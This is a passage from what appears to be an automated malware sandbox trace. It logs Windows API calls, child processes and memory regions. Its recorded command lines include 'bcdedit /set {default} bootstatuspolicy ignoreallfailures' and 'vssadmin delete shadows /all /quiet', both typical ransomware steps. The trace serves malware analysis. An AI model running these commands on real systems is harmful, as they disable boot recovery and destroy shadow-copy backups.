lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.742] FindClose (in: hFindFile=0x2b20a0 | out: hFindFile=0x2b20a0) returned 1 [0214.742] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0214.742] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0214.742] GetConsoleTitleW (in: lpConsoleTitle=0x1cf6b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.743] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf53c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf604 | out: lpAttributeList=0x1cf53c, lpSize=0x1cf604) returned 1 [0214.743] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf53c, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf5fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf53c, lpPreviousValue=0x0) returned 1 [0214.743] GetStartupInfoW (in: lpStartupInfo=0x1cf4f8 | out: lpStartupInfo=0x1cf4f8*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0214.743] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.743] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1cf598*(cb=0x48, lpReserved=0x0, lpDesktop="", lpTitle="bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf5e4 | out: lpCommandLine="bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x1cf5e4*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd08, dwThreadId=0xa8c)) returned 1 [0214.756] CloseHandle (hObject=0x4c) returned 1 [0214.756] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.756] GetEnvironmentStringsW () returned 0x2b2530* [0214.756] FreeEnvironmentStringsW (penv=0x2b2530) returned 1 [0214.757] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0214.983] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cf4d8 | out: lpExitCode=0x1cf4d8*=0x0) returned 1 [0214.983] CloseHandle (hObject=0x50) returned 1 [0214.983] _vsnwprintf (in: _Buffer=0x1cf620, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf4e4 | out: _Buffer="00000000") returned 8 [0214.983] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0214.983] GetEnvironmentStringsW () returned 0x2b2530* [0214.983] FreeEnvironmentStringsW (penv=0x2b2530) returned 1 [0214.984] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.984] GetEnvironmentStringsW () returned 0x2b2530* [0214.984] FreeEnvironmentStringsW (penv=0x2b2530) returned 1 [0214.984] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf53c | out: lpAttributeList=0x1cf53c) [0214.984] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.984] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.984] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.984] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0214.984] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.984] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0214.984] SetConsoleInputExeNameW () returned 0x1 [0214.984] GetConsoleOutputCP () returned 0x1b5 [0214.984] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.984] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.985] exit (_Code=0) Process: id = "323" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16dc0" os_pid = "0xb7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "321" os_parent_pid = "0xb9c" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24687 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24688 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24689 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24690 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 24691 start_va = 0x610000 end_va = 0x616fff entry_point = 0x610000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 24692 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24693 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24694 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24695 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 24696 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24697 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24698 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24699 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24700 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 24701 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 24702 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 24703 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24704 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24705 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24706 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24707 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24708 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24709 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24710 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24711 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24712 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24713 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24714 start_va = 0x2a0000 end_va = 0x367fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24715 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24716 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 437 os_tid = 0xc00 Process: id = "324" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16dc0" os_pid = "0xbfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "321" os_parent_pid = "0xb9c" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24727 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24728 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24729 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24730 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 24731 start_va = 0x800000 end_va = 0x806fff entry_point = 0x800000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 24732 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24733 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24734 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24735 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 24736 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24737 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24738 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24739 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24740 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 24741 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 24742 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 24743 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24744 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24745 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24746 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24747 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24748 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24749 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24750 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24751 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24752 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24753 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24754 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 24755 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24756 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 438 os_tid = 0xc30 Process: id = "325" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16dc0" os_pid = "0xc64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "321" os_parent_pid = "0xb9c" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24793 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24794 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24795 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24796 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 24797 start_va = 0x970000 end_va = 0x976fff entry_point = 0x970000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 24798 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24799 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24800 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24801 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 24802 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24803 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24804 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24805 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24806 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 24807 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 24808 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 24809 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24810 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24811 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24812 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24813 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24814 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24815 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24816 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24817 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24818 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24819 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24820 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 24821 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24822 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 439 os_tid = 0xc20 Process: id = "326" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x7ea16c00" os_pid = "0xc24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "322" os_parent_pid = "0xb68" cmd_line = "vssadmin.exe delete shadows /all /quiet " cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24840 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24841 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24842 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24843 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 24844 start_va = 0x960000 end_va = 0x97efff entry_point = 0x960000 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\System32\\vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe") Region: id = 24845 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24846 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24847 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24848 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 24849 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24907 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24908 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24909 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24910 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 24911 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 24912 start_va = 0x70370000 end_va = 0x7037ffff entry_point = 0x70370000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 24913 start_va = 0x70380000 end_va = 0x70495fff entry_point = 0x70380000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 24914 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 24915 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24916 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24917 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24918 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 24919 start_va = 